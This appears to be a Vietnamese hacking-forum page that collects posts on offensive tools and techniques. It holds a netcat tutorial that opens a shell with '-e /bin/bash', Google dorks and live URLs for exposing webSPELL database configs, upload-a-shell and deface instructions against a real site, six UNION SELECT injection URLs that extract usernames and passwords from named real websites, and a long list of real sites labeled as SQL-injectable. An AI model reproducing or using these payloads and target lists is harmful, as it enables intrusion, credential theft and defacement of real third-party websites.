CodeXploiter 1.0 - Tìm kiếm các lỗ hổng trong các file PHP

CodeXploiter is a White-Box scanner used for finding vulnerabilities in PHP files. It scans PHP source code files automatically based on selected rules and configurations.
CodeXploiter helps security professionals to highlight possible vulnerabilities in a timely manner by automating the process of source code analysis. As a result this will let security professionals focus more on vulnerability research and exploit development.
CodeXploiter has a user-friendly interface that suits the needs of security professionals and average users who are interested in the field of vulnerability research and exploit development.

  

• Detects common vulnerabilities such as:
  
  • SQL Injection
  • Cross Site Scripting (XSS)
  • Remote/Local File Inclusion
  • PHP Code Execution
  • Command Execution
  • File Access
  • File Upload
• Searches for vulnerabilities in user-defined functions
• Customizable scan options
• Vulnerabilities are grouped based on file names and vulnerability type
• Scan single or multiple files
• Fast scanner
• Easy to use and user-friendly Graphical User Interface (GUI)

Download Details:

• Version: 1.0
• Size: 3.71 MB
• System Requirements: Microsoft Windows 8, Microsoft Windows 7, Windows Vista, or Windows XP
  

Download Now

Xem Thêm

[Tutorial]Backconnect with netcat

1.Download

netcat windows-http://anonym.to/?http://joncraton.o...at-for-windows
nc to upload with shell-http://www.multiupload.nl/TOBD6TAOXE

2.Upload nc with shell


3.set chmod 777 for nc

chmod 777 nc

4.run command ./nc -vv -l -p [port] -e /bin/bash at shell

./nc -vv -l -p 4499 -e /bin/bash

5.open cmd direct to where nc save like this cd c:\
and run this command nc -vv [ip target] [port]

C:\>nc -vv ip server 4499

6.now you have back connect it

Xem Thêm

WebShell remote Configuration excution

webShell 4.O remote Configuration excution

vulnerable url : http://website.com/picture.php?file=_mysql.php

             

Dorks : ext:php intitle:webSPELL v4.0

            "inurl:/picture.php?file="

Find  vulnerable website and goto  http://website.com/picture.php?file=_mysql.php

you'll get a Blanck Page 

press ctrl+U and view source 

you'll find something like this 

Now connect to database and do whatever you want
Live demo : 

http://www.echoes-guild.com/picture.php?file=_mysql.php

http://www.crazyfungamer.de/picture.php?file=_mysql.php 

http://www.dj-pedrofernandez.de/cgi//picture.php?file=_mysql.php

http://r0fld2.uw.hu/picture.php?file=_mysql.php

http://www.street.clanfusion.de/picture.php?file=_mysql.php

Xem Thêm

CK Hash Cracker

CK_HASH_CRACKER VERSION 3.0 Download Link: Click Here

__Change Log__
Hash Identifier Modified
Online Database Checker Bug Fixed And Works Faster
Offline Database Search Engine Modified
Rainbow Table Algorithm Added

How To Add Additional Database Release?

After Installation with the Default Settings, A Folder Named CK_Hash_Cracker Verion 3.0 will be Created in Root Directory/Program Files, which is mostly C: Drive, So that path will Be C:\Program Files\CK_Hash_Cracker-Version 3.0; under This Folder There Are Two Folders Named "Brute" And "DatabaseConnector"

Files Under "Brute" Folder Is Used For BruteForcing, Make Sure If You Place Additional WordList, You Do Not Have Duplicate Words, Otherwise It will just increase the Time. You Can Place Files With Any Name Under This Folder, It Will Work Fine, until the Files Are in Readable Format

Files Under "DatabaseConnector" Are The Offline Database, So For Any Database Releases, After Downloading Databases, Put The Files Under "DatabaseConnector" Folder And Thats It, The Tool Will Automatically Upgrade The Database.

Its Has A Self-Installer, So To Install, Just Run The Setup file. To Uninstall, You Can Remove It From Control Panel Or From The Self Uninstaller.

If You Get Error At Run-Time, Probably You Do Not Have The Microsoft Visual C++ 2008 Installed, The Application doesn't need Python To Run, But It Needs The Run-Time Components. You Get The Download Packages From Here:

For Windows 32 bit: Click Here

For Windows 64 bit: Click Here

And Then Try Running The Application.CK_Hash_Cracker (Version 3.0) Download Link: Click Here

Xem Thêm

"Testing Image collection" shell and files upload vulnrablity

Dorks : inurl:"modules/filemanagermodule/actions/?picker.php??id=0"
           intitle:"Testing Image Collections"

Goto Google or Bing and Type Dork  inurl:"modules/filemanagermodule/actions/?picker.php??id=0" or intitle:"Testing Image Collections"
now see search results in google or bing search ..
select any site from search results and look for upload option

Now select your shell or deface page and upload it

To view your upload shell or deface go to:
http://website.com/files/yourfilehere  or
http://websites.com/path/yourfilehere

Example -
http://www.dogandduckfc.com/newsite/modules/filemanagermodule/actions/picker.php?id=0 

Xem Thêm

Exidous CMD Shell

Connect to shell



Connected


XSA Tool


Getting Username


Going to that directory


Dir Listing

Just For Fun (/etc/passwd)

Download

Xem Thêm

Smart Hunter v.1.4.3 Public Version

 

Download : http://adf.ly/FRrSF

Xem Thêm

6 Random Injections

1

Mã:

http://www.elansystems.co.za/product-item.php?product_items_id=-11 UNION SELECT 1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,group_concat(username, ​0x3b,password),5,6,7,8,9,10 from users_tbl--

2/

Mã:

http://www.nbjm-sprayer.com/products.php?id=-1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,group_concat(username,0x3b,password),18,1 ​9,20,21,22,23 from user_table--

3/

Mã:

http://www.mcdonaldlawoffice.net/story.php?articleid=-8 UNION SELECT 1,2,group_concat(name,0x3b,password),4,5,6,7,8,9,10,11,12,13,14,15,16 from users--

4/

Mã:

http://localtime.biz/product.php?cat_id=-1 UNION SELECT 1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(email,0x3b, ​pwd,0x3c,0x62,0x72,0x3e),4 from users--

5/

Mã:

http://www.eltee.de/kolumnen_id.php?id=-30175 UNION SELECT 1,2,3,4,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),6,7,8--

6/

Mã:

http://www.media4world.de/mini_d/list_art.php?shop=-5 UNION SELECT group_concat(username,0x3b,kwort,0x3b,admin,0x3c,0x62,0x72,0x3e) from user--

Xem Thêm

Projects CEH 95MB

http://data.ceh.vn/download/projects-ceh.vn.rar

Pass: giải nén : ceh.vn

Xem Thêm

The Debian Administrator’s Handbook

The BackTrack Team is proud to have contributed 1000 EUR to the Debian Administrator’s Handbook liberation fund. This book, written by two Debian developers, is a welcome addition to any administrator’s bookshelf. Debian is very popular on servers and it’s also the base distribution from which BackTrack is forged.
Security is not in rest in this book since a full chapter is dedicated to the topic. It covers setting up a firewall, monitoring, intrusion detection systems, setting up SELinux policies, dealing with a compromised machine, and gives many thoughful advice to define a security policy within your organization.


The authors have pledged to release the book under an open source license if the associated “liberation fund” reaches 25,000 EUR. Today, there’s less than 3,000 EUR to raise and we invite you to contribute as well. By giving 10 EUR or more, you’ll get a copy of the ebook as soon as it’s available (even if the liberation fund is not completed). Click here to contribute now.


The book is planned to be released in April but in the mean time you can have a peek at a sample chapter and the full table of contents. We have no doubt that this book will provide a solid foundation to all those looking to better understand Debian, BackTrack and Linux at large.

Nguồn: backtrack-linux.org

LINKDOWN EBOOK

Trích dẫn: http://debian-handbook.info/get/now/

http://www.fshare.vn/file/T059CNM8ST/

Xem Thêm

- Site lỗi SQL

Found : http://www.falconhead.com/products.php?id='11 Found : http://www.solobambini.com/products.php?products_line_id='1 Found : http://www.crispi.it/it/products.php?id_menu='2 Found : http://www.jrmerritt.com/products.php?page_id='135 Found : http://www.downhilldragonclan.com/products.php?id='42 Found : http://www.tekaillumination.com/products.php?ID='92 Found : http://www.med-int.com/products.php?id='13 Found : http://www.actmachines.com/cart/products.php?id='87 Found : http://www.mtiadventurewear.com/products.php?id='40 Found : http://www.stringease.com/products.php?cat='snaps&id='fastach_clips Found : http://www.tonyjeary.com/products.php?cat_id='2 Found : http://www.bmfwallets.com/products.php?id='6 Found : http://www.flexiblewhips.com/products.php?id='10 Found : http://www.pepperball.com/products.php?category_id='51 Found : http://www.duckhuntingwaders.com/products.php?ID='552 Found : http://www.matrixinnovations.co.uk/products.php?id='1 Found : http://www.stormtec.ca/products.php?id='4 Found : http://www.stormtec.ca/products.php?id='11 Found : http://wayet-lighting.com/products.php?id='2 Found : http://wayet-lighting.com/products.php?id='2 Found : http://remsoft.com/products.php?id='1 Found : http://www.esoterikaudio.com.au/products.php?product_id='31 Found : http://www.gsboxing.com/products.php?iD='70-0-0-0 Found : http://www.everyway-medical.com/products.php?id='35 Found : http://www.midwestfolding.com/products.php?prodline_id='11&product_id='307 Found : http://www.advantagecontrols.com/products.php?category_id='3&products_id='7 Found : http://www.crispi.it/it/products.php?id_menu='1 Found : http://www.dxgeneration.com/products.php?details-id='30 Found : http://www.stormtec.ca/products.php?id='3 Found : http://www.najarianfurniture.com/products.php?id='40 Found : http://www.rajagro.com/products.php?cat_id='8 Found : http://www.antiques-oronoco.com/products.php?id='176 Found : http://www.hughes-and-kettner.com/products.php5?mode='prod&id='115 Found : http://sivaana.com/products.php?cat_id='1&page='0 Found : http://www.phidgets.com/products.php?category='13%26product_id='1062"target='"_blank http://www.rideitmoto.com/products.php?id='16"target='"_blank http://www.cheekyherbs.com/products.php?id='8"target='"_blank http://www.simiotica.com/products.php?id='12"target='"_blank http://www.musicalsounds.us/products.php?id='MOSSCADE"target='"_blank http://www.shopbabybliss.com/products.php?id='53"target='"_blank http://proforceequipment.com/products.php?id='25"target='"_blank http://www.aor.ca/html/products.php?id='14"target='"_blank http://www.jsr-productions.com/products.php?id='16"target='"_blank http://www.thebellydanceshop.com/products.php?id='22"target='"_blank Found : http://www.drnorthrup.com/bookstore/northrup_products.php?product_id='238"target='"_blank http://www.unitedforms.com/products/products.php?id='3%26product_id='2"target='"_blank http://www.thintuition.com/products.php?category_id='103"target='"_blank http://www.cubancrafters.com/products/DESKTOP-HUMIDORS-BY-CUBAN-CRAFTERS-%25252d-100-CIGAR-BARGAIN-HUMIDOR-FEATURES-GLOSS-ROSEWOOD-WITH-SPANISH-CEDAR-INTERIOR.html"target='"_blank http://www.mdhelicopters.com/products.php?id='MD_600N"target='"_blank http://www.tonartllc.com/products.php?id='floating-buddha"target='"_blank http://metalkraft.com/products.php?id='6"target='"_blank Found : http://www.gs-sport.com/products.php?en_product_id='2"target='"_blank http://www.thermalright.com/products/index.php?cat_id='27"target='"_blank http://www.sanyohvac.com/products.php?id='12KHS71"target='"_blank http://www.pistolgear.com/products.php?id='46"target='"_blank http://www.akiles.com/products.php?category_id='13%26product_id='1080"target='"_blank http://www.icandyuk.com/products.php?id='cherry"target='"_blank http://www.brookfieldpoultryequipment.com/products.php?id='50"target='"_blank http://www.flightdecksolutions.com/list_products.php?id='22"target='"_blank http://www.eurocomponentsusa.com/frame_%26_suspension/products.php?id='0504"target='"_blank http://www.protofab4x4.com/products.php?ID='05"target='"_blank http://www.avalonprod.com/products.php?prod_id='40"target='"_blank http://www.riderstation.com/catalog/products.php?id='35"target='"_blank http://www.eotech-inc.com/products.php?id='3"target='"_blank http://www.unitedforms.com/products/products.php?id='1%26product_id='1"target='"_blank http://www.therealseedcompany.com/products.php?product_id='12"target='"_blank http://plywood.boatbuildercentral.com/products.php?id='3"target='"_blank http://www.louroe.com/products.php?id='55"target='"_blank http://www.fabricut.com/products.php?id='3"target='"_blank http://www.hubbardbreeders.com/products.php?id='11"target='"_blank http://www.filzer.com/products.php?cat_id='1"target='"_blank http://www.alphaplugins.com/products/products.php?menu='get_prod_id%26prod_id='2"target='"_blank http://www.911medicalid.com/products.php"target='"_blank Found : http://www.thebellydanceshop.com/products.php?id='5"target='"_blank http://dualsportarmory.com/products.php?category_id='141"target='"_blank http://plantoys.com/products.php?cat_id='2%26show_all='true"target='"_blank http://www.hubbardbreeders.com/products.php?id='5"target='"_blank http://www.beesto.com/index.php/extensions?id='6"target='"_blank http://www.usstove.com/index.php?route='cms/article%26path='2%26article_id='2"target='"_blank http://www.aorhealth.com/html/products.php?id='194"target='"_blank http://www.crownhill.ca/investment_products.php?id='30"target='"_blank http://www.buggyworld.com/parts/products.php?id='4"target='"_blank http://www.autokeys.us/products.php?category_id='57"target='"_blank http://www.autokeys.us/products.php?category_id='72"target='"_blank http://www.reefindustries.com/products.php?id='23"target='"_blank http://www.davescyclesupply.com/products.php?category_id='187"target='"_blank Found : http://www.xtracpads.com/products.php?prod_id='27%26section='1"target='"_blank http://www.martelcorp.com/?cat='114%26action='detail%26id='73"target='"_blank Found : http://www.fondriestbici.com/eng/products.php?cat='2%26id='19"target='"_blank http://www.vecco.com/products.php?sub_cat_id='24"target='"_blank http://muvipix.com/products.php?subcat_id='44"target='"_blank http://www.filzer.com/products.php?id='102"target='"_blank http://www.filzer.com/products.php?id='102"target='"_blank http://www.syndicatelofts.com/shop/"target='"_blank http://www.biobrite.com/products.php?category_id='1"target='"_blank http://www.wateccameras.com/products.php?prod_id='187"target='"_blank http://www.rollrite.com/products.php?c_id='17"target='"_blank http://www.avalonprod.com/products.php?prod_id='9"target='"_blank http://www.akiles.com/products.php?%26product_id='1025"target='"_blank http://www.tntfireworks.com/products.php?id='SS%26pg='5"target='"_blank http://www.mutazu.com/products.php?cat_id='1%26menu='DMY%2520Trunk%2520Series%26product_id='16%26s='prod.php"target='"_blank http://www.emp-centauri.cz/products.php?id_kateg='5%26id_pkateg='20%26id='82"target='"_blank http://www.ortega.com/products/products.php?id='7"target='"_blank http://www.drainageonline.co.uk/products.php?category_id='18"target='"_blank http://www.telit.com/en/products.php?p_id='3%26p_ac='show%26p='7"target='"_blank http://lgnrevolution.com/products.php?id='NULL"target='"_blank Found : http://greenball.com/products.php?products_id='1"target='"_blank http://www.rafaay.com/products.php?category_id='105"target='"_blank Found : http://www.muskyshop.com/modules/cart/products.php/nav_id/5/page/2/id/2321/name/StringeaseFastachMultiUseClip"target='"_blank http://www.gs-sport.com/products.php?en_product_id='1"target='"_blank Found : http://www.birdladder.com/products.php?id='415%26path='459"target='"_blank Found : http://www.bishopstontrading.co.uk/shop/products.php?category_id='28"target='"_blank http://www.musicalsounds.us/products.php?id='AcousticSolid"target='"_blank http://www.codecorp.com/products.php?id='9"target='"_blank http://www.tridentseafoods.com/retail/products.php?id='313"target='"_blank Found : http://www.firgelli.com/products.php?id='40"target='"_blank http://www.tridentseafoods.com/retail/products.php?id='564"target='"_blank http://www.mtqes.com.au/products.php?action='vehicle%26id='13"target='"_blank http://greenball.com/products.php?products_id='9739"target='"_blank Found : http://www.powermate.com/generators/products.php?cat_id='3%26s_id='25"target='"_blank http://www.sargentlock.com/products/products.php?item_id='14"target='"_blank http://expedition-timepiece.com/products.php?ID='38%26action='detail"target='"_blank Found : http://www.luckypet.com/products.php?cat='198"target='"_blank Found : http://www.bklighting.com/products.php?ID='319"target='"_blank http://www.protofab4x4.com/products.php?ID='00%26ID2='48"target='"_blank http://www.stullfeeders.com/products.php?id='139"target='"_blank Found : http://www.fullcirclehome.com/products.php?id='49%26prod_num='16"target='"_blank http://www.bliby.net/products.php?id_page='8"target='"_blank http://www.knaack.com/jobsite_storage_equipment/view_products.php?p_id='4"target='"_blank Found : http://www.viz.com/series"target='"_blank http://spraywayblack.com/products.php?id='SP-295"target='"_blank http://www.viz.com/product"target='"_blank http://www.choretimepoultry.com/products.php?product_id='9"target='"_blank http://cootacraft.com/products.php?prod_id='6"target='"_blank http://www.elinchrom.com/products.php?p_id='216"target='"_blank https://www.bavariasausage.com/shop/products.php?product_id='273%26storecategory_id='54"target='"_blank Found : http://sportcount.com/products.php?category_id='1"target='"_blank http://www.deconlabs.com/products.php?ID='1"target='"_blank http://www.rescuenorthwest.com/products.php?id='12"target='"_blank http://www.alsacorp.eu/products.php?cat_id='1"target='"_blank http://www.suitsyouswimwear.com/products.php?id='12"target='"_blank http://downtown20.net/products.php?cat_id='2"target='"_blank http://www.pistolgear.com/products.php?id='59"target='"_blank http://downtown20.net/products.php?cat_id='2"target='"_blank http://www.pistolgear.com/products.php?id='59"target='"_blank http://www.giftsintl-us.com/products.php?cat='2"target='"_blank http://www.budgetgroup.net/products.php?id_product_categ='77"target='"_blank http://www.chefs-eg.com/products.php?id='mini"target='"_blank http://www.kalopedis.com/products.php?ID='55"target='"_blank http://allnaturalcosmetics.com/products.php?view='subcategories%26cat_id='4"target='"_blank http://www.shakerhood.com/products.php?id='HemiParts"target='"_blank http://coastalstudio.com/products.php?id='76"target='"_blank http://www.imate.com/"target='"_blank http://coastalstudio.com/products.php?id='76"target='"_blank http://www.imate.com/"target='"_blank Found : Found : http://www.hughes-and-kettner.com/products.php5?mode='prod%26id='110"target='"_blank Found : http://www.equipro-bty.com/pages/products.php?id='1"target='"_blank https://www.bavariasausage.com/shop/products.php?product_id='2417%26storecategory_id='29%26storesubcategory_id='6"target='"_blank http://www.innerrange.com/products.php?id='54"target='"_blank Found : Found : Found : http://www.hughes-and-kettner.com/products.php5?mode='prod%26id='11"target='"_blank Found : http://www.kannoa.com/products.php?type='category%26id='52"target='"_blank http://www.thegadgetshop.co.za/products.php?prod_sec_id='372"target='"_blank Found : http://www.mustad.no/catalog/emea/products.php?id='43"target='"_blank http://www.powerflowsystems.com/products.php?cat_id='11%26pid='13"target='"_blank http://www.mustad.no/catalog/emea/products.php?id='43"target='"_blank http://sheltersofamerica.com/products.php?id='1"target='"_blank http://www.veroint.com/products.php?page_id='1"target='"_blank http://idqusa.com/products.php?cat='13"target='"_blank Found : http://www.xtracpads.com/products.php?prod_id='5%26section='1"target='"_blank  

Xem Thêm